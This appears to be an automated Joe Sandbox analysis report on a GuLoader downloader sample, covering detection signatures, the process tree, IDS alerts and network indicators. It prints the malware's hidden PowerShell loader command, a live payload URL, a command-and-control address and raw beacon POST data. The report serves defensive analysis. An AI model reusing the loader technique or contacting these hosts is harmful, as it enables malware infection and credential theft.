Edit tour

Windows Analysis Report
KWbWCYe6LB.exe

Overview

General Information

Sample name:	KWbWCYe6LB.exe renamed because original name is a hash value
Original sample name:	cfc18a036f28fc7a233ed8daaf747998a84b66fe3bd91d5decc45d61f1e45382.exe
Analysis ID:	1609276
MD5:	18cb6529a2a76b61525e325c8bcb655c
SHA1:	6f8a09e90e79d3ee48c8ff76bb89f76adc7a2ca1
SHA256:	cfc18a036f28fc7a233ed8daaf747998a84b66fe3bd91d5decc45d61f1e45382
Tags:	exeuser-adrian__luca
Infos:

Detection

GuLoader

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Early bird code injection technique detected

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GuLoader

AI detected suspicious PE digital signature

Found suspicious powershell code related to unpacking or dynamic code loading

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Powershell drops PE file

Queues an APC in another process (thread injection)

Suspicious powershell command line found

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sigma detected: Msiexec Initiated Connection

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

KWbWCYe6LB.exe (PID: 7976 cmdline: "C:\Users\user\Desktop\KWbWCYe6LB.exe" MD5: 18CB6529A2A76B61525E325C8BCB655C)

powershell.exe (PID: 8080 cmdline: powershell.exe -windowstyle hidden "$Skylark=gc -raw 'C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Smutches\Jormungandr.Mos';$Gymnaster=$Skylark.SubString(69514,3);.$Gymnaster($Skylark) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 1836 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.1795862045.0000000008F1E000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Signatures

System Summary

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 185.104.29.54, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 1836, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49978

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8080, TargetFilename: C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Smutches\KWbWCYe6LB.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Skylark=gc -raw 'C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Smutches\Jormungandr.Mos';$Gymnaster=$Skylark.SubString(69514,3);.$Gymnaster($Skylark) ", CommandLine: powershell.exe -windowstyle hidden "$Skylark=gc -raw 'C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Smutches\Jormungandr.Mos';$Gymnaster=$Skylark.SubString(69514,3);.$Gymnaster($Skylark) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\KWbWCYe6LB.exe", ParentImage: C:\Users\user\Desktop\KWbWCYe6LB.exe, ParentProcessId: 7976, ParentProcessName: KWbWCYe6LB.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Skylark=gc -raw 'C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Smutches\Jormungandr.Mos';$Gymnaster=$Skylark.SubString(69514,3);.$Gymnaster($Skylark) ", ProcessId: 8080, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE Generic - POST To .php w/Extended ASCII Characters (Likely Zeus Derivative)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T15:19:50.633378+0100	2016858	1	A Network Trojan was detected	192.168.2.10	49980	79.110.49.155	80	TCP

ET MALWARE Win32/AZORult V3.2 Client Checkin M15

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T15:21:05.981023+0100	2029465	1	Malware Command and Control Activity Detected	192.168.2.10	49979	79.110.49.155	80	TCP

ETPRO MALWARE AZORult CnC Beacon M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T15:21:05.981023+0100	2810276	1	Malware Command and Control Activity Detected	192.168.2.10	49979	79.110.49.155	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T15:21:03.625419+0100	2803270	2	Potentially Bad Traffic	192.168.2.10	49978	185.104.29.54	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Smutches\KWbWCYe6LB.exe

ReversingLabs: Detection: 50%

Multi AV Scanner detection for submitted file

Source: KWbWCYe6LB.exe	Virustotal: Detection: 64%			Perma Link
Source: KWbWCYe6LB.exe	ReversingLabs: Detection: 50%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: KWbWCYe6LB.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 185.104.29.54:443 -> 192.168.2.10:49978 version: TLS 1.2

Source:	Binary string: qm.Core.pdb4 source: powershell.exe, 00000003.00000002.1794178198.0000000007EC1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000003.00000002.1790382171.0000000006CD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: e.pdb\b[K source: powershell.exe, 00000003.00000002.1794178198.0000000007EC1000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\KWbWCYe6LB.exe	Code function: 0_2_00405E7E FindFirstFileA,FindClose,	0_2_00405E7E
Source: C:\Users\user\Desktop\KWbWCYe6LB.exe	Code function: 0_2_0040543A GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_0040543A
Source: C:\Users\user\Desktop\KWbWCYe6LB.exe	Code function: 0_2_00402647 FindFirstFileA,	0_2_00402647

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2029465 - Severity 1 - ET MALWARE Win32/AZORult V3.2 Client Checkin M15 : 192.168.2.10:49979 -> 79.110.49.155:80
Source: Network traffic	Suricata IDS: 2810276 - Severity 1 - ETPRO MALWARE AZORult CnC Beacon M1 : 192.168.2.10:49979 -> 79.110.49.155:80
Source: Network traffic	Suricata IDS: 2016858 - Severity 1 - ET MALWARE Generic - POST To .php w/Extended ASCII Characters (Likely Zeus Derivative) : 192.168.2.10:49980 -> 79.110.49.155:80

Source: Joe Sandbox View

ASN Name: OTAVANET-ASCZ OTAVANET-ASCZ

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.10:49978 -> 185.104.29.54:443

Source: global traffic	HTTP traffic detected: GET /wp-admin/VQiRSepSQArj147.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: ganpatmasala.nlCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /cyb1/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 79.110.49.155Content-Length: 107Cache-Control: no-cacheData Raw: 4a 4c 89 28 39 ff 4c 2f fb 39 2f fb 39 4f ed 3f 4e ed 3e 3c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 f0 4e 2f fb 39 2f fb 3f 4e ed 3e 3b ed 3e 3e ed 3f 4e ed 3e 39 ed 3e 3c 8c 28 39 f1 28 39 f0 28 39 f9 4e 4c ed 3f 4e 8c 28 39 f8 4c 2f fb 3f 2f fb 35 2f fb 34 2f fb 38 2f fb 3e 4b Data Ascii: JL(9L/9/9O?N><>3>>>;>>>3>:>=?N(9N/9/?N>;>>?N>9><(9(9(9NL?N(9L/?/5/4/8/>K
Source: global traffic	HTTP traffic detected: POST /cyb1/index.php HTTP/1.0Host: 79.110.49.155Connection: closeUser-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Content-Length: 107Data Raw: 4a 4c ef bf bd 28 39 ef bf bd 4c 2f ef bf bd 39 2f ef bf bd 39 4f ef bf bd 3f 4e ef bf bd 3e 3c ef bf bd 3e 33 ef bf bd 3e 3e ef bf bd 3e 3b ef bf bd 3e 3e ef bf bd 3e 33 ef bf bd 3e 3a ef bf bd 3e 3d ef bf bd 3f 4e ef bf bd 28 39 ef bf bd 4e 2f ef bf bd 39 2f ef bf bd 3f 4e ef bf bd 3e 3b ef bf bd 3e 3e ef bf bd 3f 4e ef bf bd 3e 39 ef bf bd 3e 3c ef bf bd 28 39 ef bf bd 28 39 ef bf bd 28 39 ef bf bd 4e 4c ef bf bd 3f 4e ef bf bd 28 39 ef bf bd 4c 2f ef bf bd 3f 2f ef bf bd 35 2f ef bf bd 34 2f ef bf bd 38 2f ef bf bd 3e 4b Data Ascii: JL(9L/9/9O?N><>3>>>;>>>3>:>=?N(9N/9/?N>;>>?N>9><(9(9(9NL?N(9L/?/5/4/8/>K

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /wp-admin/VQiRSepSQArj147.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: ganpatmasala.nlCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: ganpatmasala.nl

Source: unknown

HTTP traffic detected: POST /cyb1/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 79.110.49.155Content-Length: 107Cache-Control: no-cacheData Raw: 4a 4c 89 28 39 ff 4c 2f fb 39 2f fb 39 4f ed 3f 4e ed 3e 3c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 f0 4e 2f fb 39 2f fb 3f 4e ed 3e 3b ed 3e 3e ed 3f 4e ed 3e 39 ed 3e 3c 8c 28 39 f1 28 39 f0 28 39 f9 4e 4c ed 3f 4e 8c 28 39 f8 4c 2f fb 3f 2f fb 35 2f fb 34 2f fb 38 2f fb 3e 4b Data Ascii: JL(9L/9/9O?N><>3>>>;>>>3>:>=?N(9N/9/?N>;>>?N>9><(9(9(9NL?N(9L/?/5/4/8/>K

Source: msiexec.exe, 0000000C.00000002.1975765988.000000000740F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://79.110.49.155/13Z0_1
Source: msiexec.exe, 0000000C.00000002.1975765988.000000000740F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://79.110.49.155/cyb1/index.php
Source: msiexec.exe, 0000000C.00000002.1975765988.000000000740F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://79.110.49.155/cyb1/index.phpl
Source: msiexec.exe, 0000000C.00000002.1975765988.000000000740F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://79.110.49.155/cyb1/index.phpo
Source: KWbWCYe6LB.exe, KWbWCYe6LB.exe.3.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: KWbWCYe6LB.exe, KWbWCYe6LB.exe.3.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000003.00000002.1788832751.000000000571E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.1786216899.0000000004807000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1786216899.0000000004807000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000003.00000002.1786216899.00000000046B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.1786216899.0000000004807000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000003.00000002.1786216899.0000000004807000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.1790287990.0000000006C12000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.1933242887.000000000740F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.1933714611.000000000740F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000003.00000002.1794178198.0000000007E5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.U
Source: powershell.exe, 00000003.00000002.1786216899.00000000046B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.1786216899.0000000004807000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000003.00000002.1788832751.000000000571E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.1788832751.000000000571E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.1788832751.000000000571E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 0000000C.00000002.1975516946.00000000073DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ganpatmasala.nl/1
Source: msiexec.exe, 0000000C.00000002.1975516946.00000000073DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ganpatmasala.nl/q
Source: msiexec.exe, 0000000C.00000002.1975516946.00000000073CA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.1976148258.0000000007520000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.1975516946.000000000739A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ganpatmasala.nl/wp-admin/VQiRSepSQArj147.bin
Source: msiexec.exe, 0000000C.00000002.1975516946.00000000073CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ganpatmasala.nl/wp-admin/VQiRSepSQArj147.bin7oj
Source: msiexec.exe, 0000000C.00000002.1975516946.00000000073CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ganpatmasala.nl/wp-admin/VQiRSepSQArj147.binBo
Source: msiexec.exe, 0000000C.00000002.1975516946.00000000073CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ganpatmasala.nl/wp-admin/VQiRSepSQArj147.binO
Source: msiexec.exe, 0000000C.00000002.1975516946.000000000739A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ganpatmasala.nl/wp-admin/VQiRSepSQArj147.binR
Source: msiexec.exe, 0000000C.00000002.1975516946.000000000739A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ganpatmasala.nl/wp-admin/VQiRSepSQArj147.binZ
Source: powershell.exe, 00000003.00000002.1786216899.0000000004807000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1788832751.000000000571E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978

Source: unknown

HTTPS traffic detected: 185.104.29.54:443 -> 192.168.2.10:49978 version: TLS 1.2

Source: C:\Users\user\Desktop\KWbWCYe6LB.exe

Code function: 0_2_00404FA3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00404FA3

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Smutches\KWbWCYe6LB.exe

Jump to dropped file

Source: C:\Users\user\Desktop\KWbWCYe6LB.exe

Code function: 0_2_004030CB EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

0_2_004030CB

Source: C:\Users\user\Desktop\KWbWCYe6LB.exe	Code function: 0_2_004047E2	0_2_004047E2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_08890040	3_2_08890040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_088952C0	3_2_088952C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_088952D0	3_2_088952D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_08898778	3_2_08898778

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\nsmCD.tmp\nsExec.dll CD8496A3802378391EC425DEC424A14F5D30E242F192EC4EB022D767F9A2480F

Source: KWbWCYe6LB.exe

Static PE information: invalid certificate

Source: KWbWCYe6LB.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.evad.winEXE@6/15@1/2

Source: C:\Users\user\Desktop\KWbWCYe6LB.exe

Code function: 0_2_004042A6 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_004042A6

Source: C:\Users\user\Desktop\KWbWCYe6LB.exe

Code function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,

0_2_00402036

Source: C:\Users\user\Desktop\KWbWCYe6LB.exe

File created: C:\Users\user\AppData\Local\Ramtils

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\AFA7A44E-69414907-A8C42D14-36D981CF-D0A28953A
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03

Source: unknown	Process created: C:\Users\user\Desktop\KWbWCYe6LB.exe "C:\Users\user\Desktop\KWbWCYe6LB.exe"
Source: C:\Users\user\Desktop\KWbWCYe6LB.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Skylark=gc -raw 'C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Smutches\Jormungandr.Mos';$Gymnaster=$Skylark.SubString(69514,3);.$Gymnaster($Skylark) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\KWbWCYe6LB.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Skylark=gc -raw 'C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Smutches\Jormungandr.Mos';$Gymnaster=$Skylark.SubString(69514,3);.$Gymnaster($Skylark) "	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\KWbWCYe6LB.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWbWCYe6LB.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWbWCYe6LB.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWbWCYe6LB.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWbWCYe6LB.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWbWCYe6LB.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWbWCYe6LB.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWbWCYe6LB.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWbWCYe6LB.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWbWCYe6LB.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWbWCYe6LB.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWbWCYe6LB.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWbWCYe6LB.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWbWCYe6LB.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWbWCYe6LB.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWbWCYe6LB.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWbWCYe6LB.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWbWCYe6LB.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWbWCYe6LB.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
